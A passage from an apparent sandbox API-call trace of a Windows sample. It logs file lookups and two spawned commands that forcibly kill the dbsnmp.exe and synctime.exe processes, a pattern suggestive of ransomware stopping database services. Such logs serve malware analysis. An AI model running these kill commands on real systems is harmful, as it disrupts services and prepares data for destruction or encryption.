nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.613] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.613] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123b1778 | out: lpFileInformation=0x123b1778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.613] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.613] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123b17c8 | out: lpFileInformation=0x123b17c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.613] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.613] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123b1818 | out: lpFileInformation=0x123b1818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.613] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.613] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123b1868 | out: lpFileInformation=0x123b1868*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.613] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.613] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123b18b8 | out: lpFileInformation=0x123b18b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.613] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.614] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123b1908 | out: lpFileInformation=0x123b1908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.614] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.614] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123b1958 | out: lpFileInformation=0x123b1958*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.614] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.614] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123b19a8 | out: lpFileInformation=0x123b19a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0157.614] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0157.614] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123bad00, nSize=0x64 | out: lpBuffer="") returned 0x63 [0157.614] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b19f8 | out: lpFileInformation=0x123b19f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0157.615] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123badd0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0157.615] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1a48 | out: lpFileInformation=0x123b1a48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0157.615] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0157.615] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0157.616] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0157.616] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0157.616] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0157.616] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0157.616] GetEnvironmentStringsW () returned 0x8ea900* [0157.616] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0157.617] GetCurrentProcess () returned 0xffffffff [0157.617] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x140, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12393a00, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12393a00*=0x144) returned 1 [0157.617] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12393a04, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12393a04*=0x154) returned 1 [0157.617] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12393a08, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12393a08*=0x158) returned 1 [0157.617] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im dbsnmp.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12421500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x144, hStdOutput=0x154, hStdError=0x158), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im dbsnmp.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x13c, hThread=0x130, dwProcessId=0xef8, dwThreadId=0xd18)) returned 1 [0157.719] CloseHandle (hObject=0x130) returned 1 [0157.719] CloseHandle (hObject=0x158) returned 1 [0157.719] CloseHandle (hObject=0x154) returned 1 [0157.719] CloseHandle (hObject=0x144) returned 1 [0157.719] CloseHandle (hObject=0x140) returned 1 [0157.719] CloseHandle (hObject=0x134) returned 1 [0157.719] CloseHandle (hObject=0x138) returned 1 [0157.719] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0159.307] SetEvent (hEvent=0x150) returned 1 [0159.307] GetExitCodeProcess (in: hProcess=0x13c, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0159.308] GetProcessTimes (in: hProcess=0x13c, lpCreationTime=0x124228a0, lpExitTime=0x124228a8, lpKernelTime=0x124228b0, lpUserTime=0x124228b8 | out: lpCreationTime=0x124228a0, lpExitTime=0x124228a8, lpKernelTime=0x124228b0, lpUserTime=0x124228b8) returned 1 [0159.308] CloseHandle (hObject=0x13c) returned 1 [0159.308] SetEvent (hEvent=0x128) returned 1 [0159.308] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0159.390] SetEvent (hEvent=0x150) returned 1 [0159.390] SetEvent (hEvent=0x128) returned 1 [0159.390] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8c30, nSize=0x64 | out: lpBuffer="") returned 0x35 [0159.390] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f15e8 | out: lpFileInformation=0x123f15e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.391] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.391] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f1638 | out: lpFileInformation=0x123f1638*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.391] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.391] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1688 | out: lpFileInformation=0x123f1688*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.392] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.392] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f16d8 | out: lpFileInformation=0x123f16d8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.392] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.392] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x123f1728 | out: lpFileInformation=0x123f1728*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.392] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.392] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x123f1778 | out: lpFileInformation=0x123f1778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.392] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.392] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x123f17c8 | out: lpFileInformation=0x123f17c8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.392] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.393] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x123f1818 | out: lpFileInformation=0x123f1818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.393] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.393] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x123f1868 | out: lpFileInformation=0x123f1868*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.393] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.393] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x123f18b8 | out: lpFileInformation=0x123f18b8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.393] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.393] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x123f1908 | out: lpFileInformation=0x123f1908*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.394] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.394] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x123f1958 | out: lpFileInformation=0x123f1958*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0159.394] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0159.394] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e8d00, nSize=0x64 | out: lpBuffer="") returned 0x63 [0159.394] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f19a8 | out: lpFileInformation=0x123f19a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0159.394] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e8dd0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0159.394] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f19f8 | out: lpFileInformation=0x123f19f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0159.394] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0159.395] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0159.395] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0159.395] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0159.395] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0159.395] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0159.395] GetEnvironmentStringsW () returned 0x8ea900* [0159.395] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0159.395] GetCurrentProcess () returned 0xffffffff [0159.395] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x13c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f910, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f910*=0x140) returned 1 [0159.395] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f914, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f914*=0x144) returned 1 [0159.395] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234f918, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234f918*=0x154) returned 1 [0159.396] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im synctime.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12429500, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154), 